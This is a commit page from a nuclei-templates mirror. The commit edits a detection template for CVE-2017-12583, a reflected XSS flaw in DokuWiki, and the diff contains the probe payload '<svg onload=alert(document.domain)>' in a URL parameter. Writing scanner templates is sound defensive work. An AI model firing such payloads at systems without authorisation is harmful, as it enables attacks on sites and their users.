daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2017-12583.yaml

patch-1
Prince Chaddha 2022-04-14 12:44:00 +04:00 committed by GitHub
parent ccdd352a1d
commit 84d91e7c0e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
cves/2017/CVE-2017-12583.yaml
View File

@ -18,14 +18,14 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg onload=alert(document.domain)>'
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Unable to parse at parameter "<svg%20onload=alert(document.domain)>".</div>'
- 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'
- type: word
part: header